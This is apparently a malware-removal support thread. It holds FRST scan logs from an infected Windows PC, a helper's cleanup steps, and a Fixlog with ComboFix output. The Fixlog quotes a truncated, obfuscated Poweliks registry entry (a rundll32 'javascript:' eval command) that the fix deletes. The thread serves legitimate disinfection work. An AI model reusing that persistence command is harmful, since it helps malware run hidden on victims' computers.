2013-03-09 00:09 - 2014-07-28 19:10 - 00109568 _____ () Q:\Program Files\Winamp\Plugins\in_midi.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00050176 _____ () Q:\Program Files\Winamp\Plugins\in_mkv.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00164864 _____ () Q:\Program Files\Winamp\Plugins\in_mod.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00294400 _____ () Q:\Program Files\Winamp\Plugins\in_mp3.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00054272 _____ () Q:\Program Files\Winamp\Plugins\in_mp4.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00075776 _____ () Q:\Program Files\Winamp\Plugins\in_nsv.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00023552 _____ () Q:\Program Files\Winamp\Plugins\in_swf.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00253952 _____ () Q:\Program Files\Winamp\Plugins\in_vorbis.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00016896 _____ () Q:\Program Files\Winamp\Plugins\in_wave.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00253440 _____ () Q:\Program Files\Winamp\libsndfile.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00313856 _____ () Q:\Program Files\Winamp\Plugins\in_wm.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00022528 _____ () Q:\Program Files\Winamp\Plugins\out_disk.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00052736 _____ () Q:\Program Files\Winamp\Plugins\out_ds.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00019456 _____ () Q:\Program Files\Winamp\Plugins\out_wave.dll
2009-04-28 16:20 - 2014-07-28 19:10 - 00040448 _____ () Q:\Program Files\Winamp\Plugins\dsp_sps.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 01794560 _____ () Q:\Program Files\Winamp\Plugins\gen_ff.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00088576 _____ () Q:\Program Files\Winamp\tataki.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00344576 _____ () Q:\Program Files\Winamp\Plugins\freeform\wacs\freetype\freetype.wac
2013-03-09 00:09 - 2014-07-28 19:10 - 00028160 _____ () Q:\Program Files\Winamp\Plugins\gen_hotkeys.dll
2013-01-01 22:13 - 2014-07-28 19:10 - 00189440 _____ () Q:\Program Files\Winamp\Plugins\gen_jumpex.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00325120 _____ () Q:\Program Files\Winamp\Plugins\gen_ml.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00305664 _____ () Q:\Program Files\Winamp\Plugins\ml_local.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00086528 _____ () Q:\Program Files\Winamp\Plugins\ml_playlists.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00097280 _____ () Q:\Program Files\Winamp\Plugins\ml_cloud.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00250368 _____ () Q:\Program Files\Winamp\Plugins\ml_devices.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00124928 _____ () Q:\Program Files\Winamp\Plugins\ml_online.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00275456 _____ () Q:\Program Files\Winamp\Plugins\ml_pmp.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00060928 _____ () Q:\Program Files\Winamp\Plugins\pmp_android.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00060928 _____ () Q:\Program Files\Winamp\Plugins\pmp_cloud.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00173056 _____ () Q:\Program Files\Winamp\Plugins\pmp_ipod.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00020992 _____ () Q:\Program Files\Winamp\Plugins\pmp_njb.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00118272 _____ () Q:\Program Files\Winamp\Plugins\pmp_p4s.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00053760 _____ () Q:\Program Files\Winamp\Plugins\pmp_usb.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00103936 _____ () Q:\Program Files\Winamp\Plugins\pmp_wifi.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00029184 _____ () Q:\Program Files\Winamp\Plugins\ml_bookmarks.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00054272 _____ () Q:\Program Files\Winamp\Plugins\ml_history.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00201216 _____ () Q:\Program Files\Winamp\Plugins\ml_disc.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00028672 _____ () Q:\Program Files\Winamp\Plugins\ml_autotag.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00061952 _____ () Q:\Program Files\Winamp\Plugins\ml_impex.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00083456 _____ () Q:\Program Files\Winamp\Plugins\ml_plg.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00033792 _____ () Q:\Program Files\Winamp\Plugins\ml_rg.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00032256 _____ () Q:\Program Files\Winamp\Plugins\ml_transcode.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00025600 _____ () Q:\Program Files\Winamp\Plugins\gen_tray.dll
2013-01-28 23:06 - 2013-03-06 13:11 - 00757248 _____ () Q:\Program Files\Last.fm\unicorn.dll
2013-01-28 23:06 - 2013-03-06 13:11 - 00032768 _____ () Q:\Program Files\Last.fm\logger.dll
2013-01-28 23:06 - 2013-03-05 13:25 - 00350720 _____ () Q:\Program Files\Last.fm\lastfm.dll
2013-01-28 23:06 - 2013-03-06 13:11 - 00126976 _____ () Q:\Program Files\Last.fm\listener.dll
2013-01-28 23:06 - 2013-01-18 11:39 - 00302592 _____ () Q:\Program Files\Last.fm\phonon.dll
2013-03-25 22:06 - 2013-01-18 11:49 - 00182784 _____ () Q:\Program Files\Last.fm\plugins\phonon_backend\phonon_vlc.dll
2013-01-28 23:06 - 2012-12-13 00:12 - 00111104 _____ () Q:\Program Files\Last.fm\libvlc.dll
2013-01-28 23:06 - 2012-12-13 00:13 - 02286592 _____ () Q:\Program Files\Last.fm\libvlccore.dll
2013-03-25 22:06 - 2012-12-13 00:13 - 00049664 _____ () Q:\Program Files\Last.fm\plugins\audio_output\libaout_directx_plugin.dll
2010-07-15 21:35 - 2010-07-15 21:35 - 00573440 _____ () Q:\Program Files\VistaMaster\VistaMaster.Helper.dll
2014-07-22 00:10 - 2014-07-15 05:24 - 14664008 _____ () C:\Program Files\Google\Chrome\Application\36.0.1985.125\PepperFlash\pepflashplayer.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:EBAA0CD9
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Conew Rescue Service => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\IMFservice => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Conew Rescue Service => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\Services: AntiARPClientLoader => 2
MSCONFIG\Services: Nero BackItUp Scheduler 3 => 3
MSCONFIG\Services: NitroReaderDriverReadSpool => 3
MSCONFIG\Services: ServiceLayer => 3
MSCONFIG\Services: ZhuDongFangYu => 
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^PPTV.lnk => 
MSCONFIG\startupfolder: C:^Users^THINK^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^监视墨水警告 - .lnk => C:\windows\pss\监视墨水警告 - .lnk.Startup
MSCONFIG\startupfolder: C:^Users^THINK^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^监视墨水警告 - HP Officejet Pro 8600 (网络).lnk => C:\windows\pss\监视墨水警告 - HP Officejet Pro 8600 (网络).lnk.Startup
MSCONFIG\startupreg: APSDaemon => "C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: Creative SB Monitoring Utility => RunDll32 sbavmon.dll,SBAVMonitor
MSCONFIG\startupreg: iTunesHelper => "Q:\Program Files\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: renrenservice => "C:\Users\THINK\AppData\Roaming\renren.com\RenRenService.exe" /background
 
==================== Faulty Device Manager Devices =============
 
Name: A5KFHFES IDE Controller
Description: A5KFHFES IDE Controller
Class Guid: {4D36E97B-E325-11CE-BFC1-08002BE10318}
Manufacturer: 
Service: atytwtun
Problem: : Windows cannot load the device driver for this hardware. The driver may be corrupted or missing. (Code 39)
Resolution: Reasons for this error include a driver that is not present; a binary file that is corrupt; a file I/O problem, or a driver that references an entry point in another binary file that could not be loaded.
Uninstall the driver, and then click "Scan for hardware changes" to reinstall or upgrade the driver.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (09/15/2014 04:58:06 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: WmiApRplC:\Windows\system32\wbem\WmiApRpl.dll4
 
Error: (09/15/2014 04:58:04 PM) (Source: PerfNet) (EventID: 2004) (User: )
Description: 
 
Error: (09/15/2014 04:58:03 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: MSDTCC:\windows\system32\msdtcuiu.DLL4
 
Error: (09/15/2014 04:58:02 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: LsaC:\windows\system32\Secur32.dll4
 
Error: (09/15/2014 04:58:02 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: ESENTC:\windows\system32\esentprf.dll4
 
Error: (09/15/2014 04:58:02 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: .NETFrameworkC:\windows\system32\mscoree.dll4
 
Error: (09/15/2014 04:34:22 PM) (Source: PerfNet) (EventID: 2004) (User: )
Description: 
 
Error: (09/15/2014 04:28:22 PM) (Source: PerfNet) (EventID: 2004) (User: )
Description: 
 
Error: (09/15/2014 04:26:13 PM) (Source: PerfNet) (EventID: 2004) (User: )
Description: 
 
Error: (09/15/2014 01:44:41 PM) (Source: PerfNet) (EventID: 2004) (User: )
Description: 
 
 
System errors:
=============
 
Microsoft Office Sessions:
=========================
Error: (10/24/2013 06:51:22 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 1, Application Name: Microsoft Office Excel, Application Version: 12.0.6665.5003, Microsoft Office Version: 12.0.6612.1000. This session lasted 1100 seconds with 780 seconds of active time.  This session ended with a crash.
 
Error: (07/11/2013 09:31:47 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 1309 seconds with 240 seconds of active time.  This session ended with a crash.
 
Error: (05/14/2013 02:52:10 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 15097 seconds with 7380 seconds of active time.  This session ended with a crash.
 
Error: (04/12/2012 06:31:37 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6425.1000, Microsoft Office Version: 12.0.6612.1000. This session lasted 25372 seconds with 14820 seconds of active time.  This session ended with a crash.
 
Error: (03/29/2012 01:50:22 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6423.1000, Microsoft Office Version: 12.0.6612.1000. This session lasted 7 seconds with 0 seconds of active time.  This session ended with a crash.
 
 
CodeIntegrity Errors:
===================================
  Date: 2014-09-15 17:15:06.800
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-09-15 17:15:06.595
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-09-15 17:15:06.390
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-09-15 17:15:06.157
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-09-15 17:14:41.058
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-09-15 17:14:40.849
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-09-15 17:14:40.588
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-09-15 17:14:40.364
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-09-15 17:13:58.186
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\360AvFlt.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-09-15 17:13:57.982
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\360AvFlt.sys because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™2 Duo CPU P8400 @ 2.26GHz
Percentage of memory in use: 54%
Total physical RAM: 3065.07 MB
Available physical RAM: 1400.96 MB
Total Pagefile: 5016.04 MB
Available Pagefile: 2570.06 MB
Total Virtual: 2047.88 MB
Available Virtual: 1920.55 MB
 
==================== Drives ================================
 
Drive c: (SW_Preload) (Fixed) (Total:46.31 GB) (Free:5.02 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive f: (Games) (Fixed) (Total:35.1 GB) (Free:7.21 GB) NTFS
Drive g: (Video) (Fixed) (Total:65.13 GB) (Free:41.21 GB) NTFS
Drive h: (Music) (Fixed) (Total:65.34 GB) (Free:3.58 GB) NTFS
Drive q: (Lenovo) (Fixed) (Total:19.54 GB) (Free:4.69 GB) NTFS
Drive s: (SERVICEV003) (Fixed) (Total:1.46 GB) (Free:0.34 GB) NTFS ==>[System with boot components (obtained from reading drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 232.9 GB) (Disk ID: E6744A16)
Partition 1: (Active) - (Size=1.5 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=46.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=19.5 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=165.6 GB) - (Type=05)
 
==================== End Of Log ============================


#4 aharonov

  • Malware Response Team
  • 2,441 posts
  • Gender:Male
  • Local time:02:34 PM

Posted 15 September 2014 - 05:04 PM

Hello Jay,

here are the next steps for you:


Step 1

Please download the attached fixlist.txt and save it in the same directory as FRST.
  • Start FRST with Administrator privileges.
  • Press the Fix button.
  • When finished, a log file (Fixlog.txt) pops up and is saved to the same location the tool was run from.
    Please copy and paste its contents in your next reply.


Step 2

Please download the ESET Online Scanner and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start esetsmartinstaller_enu.exe with administrator privileges.
  • Select the option Yes, I accept the Terms of Use and click on Start.
  • Make sure that the option Remove found threats is NOT checked, and the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
    • Scan for potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
  • Click on Start. The virus signature database will begin to download. This may take some time.
  • When completed the Online Scan will begin automatically.
    Note: This scan might take a long time! Please be patient.
  • When completed select Uninstall application on close if you so wish, but make sure you copy the logfile first!
  • Now click on Finish
  • A log file is created at C:\Program Files\ESET\EsetOnlineScanner\log.txt.
    Copy and paste the content of this log file in your next reply.
Note: Do not forget to re-enable your antivirus application after running the above scan!



Step 3

Start FRST with administrator privileges.
  • Press the Scan button.
  • When finished, FRST will produce a log (FRST.txt) in the same directory the tool was run from.
    Please copy and paste this log in your next reply.


#5 firzenj

  • Topic Starter

  • Members
  • 6 posts
  • Gender:Male
  • Local time:07:34 AM

Posted 15 September 2014 - 09:17 PM

Thx :) powershell and dllhost stopped flashing in the task manager.

Fixlog.txt:


Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 12-09-2014
Ran by THINK at 2014-09-15 18:08:59 Run:2
Running from C:\Users\THINK\Desktop
Boot Mode: Normal
 
==============================================
 
Content of fixlist:
*****************
CloseProcesses:
HKU\S-1-5-21-55330172-1766457534-1491637609-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Task: {4237464F-3E47-4C1D-8285-1E21C40AAE67} - System32\Tasks\{AF5E48FE-C0D2-FAE1-AFA0-F804CFB8B7DB} => C:\Users\THINK\AppData\Roaming\wygiusy.dll/s "C:\Users\THINK\AppData\Roaming\wygiusy.dll"
C:\Users\THINK\AppData\Roaming\wygiusy.dll
CMD: type C:\ComboFix.txt
EmptyTemp:
*****************
 
Processes closed successfully.
"HKU\S-1-5-21-55330172-1766457534-1491637609-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-55330172-1766457534-1491637609-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4237464F-3E47-4C1D-8285-1E21C40AAE67}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4237464F-3E47-4C1D-8285-1E21C40AAE67}" => Key deleted successfully.
C:\Windows\System32\Tasks\{AF5E48FE-C0D2-FAE1-AFA0-F804CFB8B7DB} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{AF5E48FE-C0D2-FAE1-AFA0-F804CFB8B7DB}" => Key deleted successfully.
"C:\Users\THINK\AppData\Roaming\wygiusy.dll" => File/Directory not found.
 
=========  type C:\ComboFix.txt =========
 
ComboFix 14-09-14.01 - THINK 14/09/14  13:19:17.1.2 - x86 NETWORK
ִλ: c:\users\THINK\Desktop\ComboFix.exe
AV: 360ɱ *Enabled/Updated* {6F7A6B22-2309-7CD0-AF79-D11A4916C60C}
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 * ɹ»ԭ
.
.
(((((((((((((((((((((((((((((((((((((((   ɾĵ   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
C:\360Rec
c:\360rec\20140902\122AEF5.vir
C:\CFLog
c:\cflog\UDPCheckErrorInfo.txt
C:\desktop.ini
c:\program files\Virtual Camara
c:\program files\Virtual Camara\BlueHorn.smf
c:\program files\Virtual Camara\SkinMagicTrial.dll
c:\program files\Virtual Camara\Uninstall.exe
c:\program files\Virtual Camara\vcam.jpg
c:\program files\Virtual Camara\VCamMainSvr.exe
c:\program files\Virtual Camara\VCamTransFilter.ax
c:\program files\Virtual Camara\VirtualCam.ax
c:\program files\WinPCap
c:\program files\WinPCap\daemon_mgm.exe
c:\program files\WinPCap\INSTALL.LOG
c:\program files\WinPCap\npf_mgm.exe
c:\program files\WinPCap\rpcapd.exe
c:\program files\WinPCap\Uninstall.exe
c:\programdata\114la.ico
c:\programdata\avbase.dat
c:\programdata\Roaming
c:\programdata\Roaming\Intel\Wireless\Settings\Settings.ini
c:\users\Administrator.THINK-PC\AppData\Roaming\SogouExplorer
c:\users\Administrator.THINK-PC\AppData\Roaming\SogouExplorer\Bin\flash_wk.dll
c:\users\Administrator.THINK-PC\AppData\Roaming\SogouExplorer\Bin\malurl.dat
c:\users\Administrator.THINK-PC\AppData\Roaming\SogouExplorer\datapack1
c:\users\Administrator.THINK-PC\AppData\Roaming\SogouExplorer\datapack2
c:\users\Administrator.THINK-PC\AppData\Roaming\SogouExplorer\datapack3
c:\users\Administrator.THINK-PC\AppData\Roaming\SogouExplorer\MetaSearch\metasearchupdate1
c:\users\Administrator.THINK-PC\AppData\Roaming\SogouExplorer\MetaSearch\metasearchupdate2
c:\users\Administrator.THINK-PC\AppData\Roaming\SogouExplorer\script.dat
c:\users\Administrator.THINK-PC\AppData\Roaming\SogouExplorer\urlblack.dat
c:\users\Default\AppData\Roaming\SogouExplorer
c:\users\Default\AppData\Roaming\SogouExplorer\Bin\flash_wk.dll
c:\users\Default\AppData\Roaming\SogouExplorer\Bin\malurl.dat
c:\users\Default\AppData\Roaming\SogouExplorer\datapack1
c:\users\Default\AppData\Roaming\SogouExplorer\datapack2
c:\users\Default\AppData\Roaming\SogouExplorer\datapack3
c:\users\Default\AppData\Roaming\SogouExplorer\MetaSearch\metasearchupdate1
c:\users\Default\AppData\Roaming\SogouExplorer\MetaSearch\metasearchupdate2
c:\users\Default\AppData\Roaming\SogouExplorer\script.dat
c:\users\Default\AppData\Roaming\SogouExplorer\urlblack.dat
c:\users\THINK\2mc2.2mc
c:\users\THINK\AppData\Local\.#
c:\users\THINK\AppData\Roaming\0000247E6BF153
c:\users\THINK\AppData\Roaming\02001E652A651C
c:\users\THINK\AppData\Roaming\115
c:\users\THINK\AppData\Roaming\115\Box\115Box.exe
c:\users\THINK\AppData\Roaming\115\Box\Drivers\VirtDisk.sys
c:\users\THINK\AppData\Roaming\115\Box\Drivers\VirtDisk64.sys
c:\users\THINK\AppData\Roaming\115\Box\sqlite3.dll
c:\users\THINK\AppData\Roaming\115\Box\Sync115Ext.dll
c:\users\THINK\AppData\Roaming\360SE
c:\users\THINK\AppData\Roaming\360SE\360SE.ini
c:\users\THINK\AppData\Roaming\baidu\hao123
c:\users\THINK\AppData\Roaming\baidu\hao123\hao123.1.0.0.1097.exe
c:\users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Virtual Camara
c:\users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Virtual Camara\Uninstall.lnk
c:\users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Virtual Camara\Virtual Camara.lnk
c:\users\THINK\AppData\Roaming\rafzvr.dll
c:\users\THINK\AppData\Roaming\SogouExplorer
c:\windows\apppatch\AppLoc.exe
c:\windows\AppPatch\Custom\{deb7008b-681e-4a4a-8aae-cc833e8216ce}.sdb
c:\windows\desktop
c:\windows\Downloaded Program Files\375291
c:\windows\Downloaded Program Files\655368
c:\windows\iun6002.exe
c:\windows\msvcr71.dll
c:\windows\SuperHidden.vbs
c:\windows\system32\1.txt
c:\windows\system32\drivers\npf.sys
c:\windows\system32\kindling.dll
c:\windows\system32\Packet.dll
c:\windows\system32\pthreadVC.dll
c:\windows\system32\SARCheck.dll
c:\windows\system32\SET10F8.tmp
c:\windows\system32\SET91ED.tmp
c:\windows\system32\SET925E.tmp
c:\windows\system32\u
c:\windows\system32\WanPacket.dll
c:\windows\system32\WinKawaks.ini
c:\windows\system32\wpcap.dll
c:\windows\system32\YingInstall
c:\windows\system32\YingInstall\804.ini
c:\windows\wininit.ini
c:\windows\Ying-UnInstall.exe
G:\360Downloads
Q:\360Downloads
q:\favoritevideo\InvisibleFolder
q:\favoritevideo\InvisibleFolder\peer_2.4.0.8326.dll.tpp
.
ܸȾ c:\windows\system32\userinit.exe ҳɹⶾ 
- c:\windows\winsxs\x86_microsoft-windows-userinit_31bf3856ad364e35_6.0.6001.18000_none_dc28ba15d1aff80b\userinit.exe ָԭ 
.
.
(((((((((((((((((((((((((((((((((((((((   /   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
-------\Legacy_NPF
-------\Legacy_PROTECTOR
-------\Legacy_TESSAFE
-------\Service_NPF
-------\Service_Protector
-------\Service_TesSafe
.
.
(((((((((((((((((((((((((  2014-08-14 2014-09-14 µĵ  )))))))))))))))))))))))))))))))
.
.
2014-09-14 16:49 . 2014-09-14 16:54 -------- d-----w- C:\FRST
2014-09-14 05:20 . 2014-09-14 05:20 -------- d-----w- c:\programdata\ksrbm
2014-09-14 03:58 . 2010-10-21 18:23 48536 ----a-w- c:\windows\system32\drivers\krpr.sys
2014-09-12 23:10 . 2014-09-12 23:10 -------- d-sh--w- c:\users\THINK\AppData\Roaming\360Quarant
2014-09-12 23:05 . 2014-07-02 16:07 358984 ----a-w- c:\windows\system32\drivers\Kemon.sys
2014-09-11 03:45 . 2014-09-11 03:45 -------- d-----w- c:\users\Public\SogouInput
2014-09-11 03:44 . 2014-09-11 03:44 0 ----a-w- c:\windows\system32\nsyF3B8.tmp
2014-09-10 06:04 . 2014-09-10 06:04 -------- d-----w- c:\users\THINK\AppData\Roaming\Foxit Software
2014-09-08 18:32 . 2014-09-08 18:32 -------- d-----w- c:\programdata\LocalStorage
2014-09-08 18:29 . 2014-09-08 18:29 -------- d-----w- c:\users\THINK\AppData\Roaming\IQIYI Video
2014-09-08 18:28 . 2014-09-08 18:29 -------- d-----w- c:\users\Public\QiYi
2014-09-06 23:55 . 2014-09-06 23:55 -------- d-----w- c:\users\THINK\AppData\Local\thunder network
2014-08-27 01:49 . 2014-08-27 01:49 2048 ----a-w- c:\windows\system32\tzres.dll
2014-08-27 01:48 . 2014-08-27 01:48 638400 ----a-w- c:\windows\system32\drivers\dxgkrnl.sys
2014-08-27 01:48 . 2014-08-27 01:48 37376 ----a-w- c:\windows\system32\cdd.dll
2014-08-27 01:48 . 2014-08-27 01:48 82432 ----a-w- c:\windows\system32\consent.exe
2014-08-27 01:48 . 2014-08-27 01:48 332800 ----a-w- c:\windows\system32\msihnd.dll
2014-08-27 01:48 . 2014-08-27 01:48 33280 ----a-w- c:\windows\system32\appinfo.dll
2014-08-27 01:48 . 2014-08-27 01:48 2263552 ----a-w- c:\windows\system32\msi.dll
2014-08-27 01:48 . 2014-08-27 01:48 1993728 ----a-w- c:\windows\system32\authui.dll
2014-08-27 01:43 . 2014-08-27 01:43 768512 ----a-w- c:\program files\Common Files\Microsoft Shared\vgx\VGX.dll
2014-08-27 01:42 . 2014-08-27 01:42 1305088 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\tipskins.dll
2014-08-27 01:42 . 2014-08-27 01:42 2051072 ----a-w- c:\windows\system32\win32k.sys
2014-08-27 01:42 . 2014-08-27 01:42 149504 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\tabskb.dll
2014-08-27 01:42 . 2014-08-27 01:42 114688 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\TipBand.dll
2014-08-27 01:42 . 2014-08-27 01:42 983552 ----a-w- c:\program files\Windows Journal\JNTFiltr.dll
2014-08-27 01:42 . 2014-08-27 01:42 965120 ----a-w- c:\program files\Windows Journal\JNWDRV.dll
2014-08-27 01:42 . 2014-08-27 01:42 1218048 ----a-w- c:\program files\Windows Journal\NBDoc.DLL
2014-08-27 01:42 . 2014-08-27 01:42 937472 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\journal.dll
2014-08-27 01:42 . 2014-08-27 01:42 506880 ----a-w- c:\windows\system32\qedit.dll
2014-08-27 01:42 . 2014-08-27 01:42 1401344 ----a-w- c:\windows\system32\msxml6.dll
2014-08-27 01:42 . 2014-08-27 01:42 1248768 ----a-w- c:\windows\system32\msxml3.dll
2014-08-27 01:41 . 2014-08-27 01:41 502784 ----a-w- c:\windows\system32\usp10.dll
2014-08-27 01:41 . 2014-08-27 01:41 915392 ----a-w- c:\windows\system32\drivers\tcpip.sys
2014-08-27 01:41 . 2014-08-27 01:41 31232 ----a-w- c:\windows\system32\drivers\tcpipreg.sys
2014-08-27 01:40 . 2014-08-27 01:40 876032 ----a-w- c:\windows\system32\wer.dll
2014-08-24 14:48 . 2014-08-24 14:48 -------- d-----w- C:\$360Section
2014-08-19 05:50 . 2014-08-19 05:50 3695208 ----a-w- c:\windows\system32\SogouPY.ime
.
.
.
((((((((((((((((((((((((((((((((((((((((   ڱ޸ĵĵ   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-09-12 22:56 . 2012-04-05 23:23 701104 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-09-12 22:56 . 2011-05-13 01:14 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-07-22 03:01 . 2014-07-22 03:01 335360 ----a-w- c:\windows\system32\SysFxUI.dll
2014-07-22 03:01 . 2014-07-22 03:01 167936 ----a-w- c:\windows\system32\drivers\portcls.sys
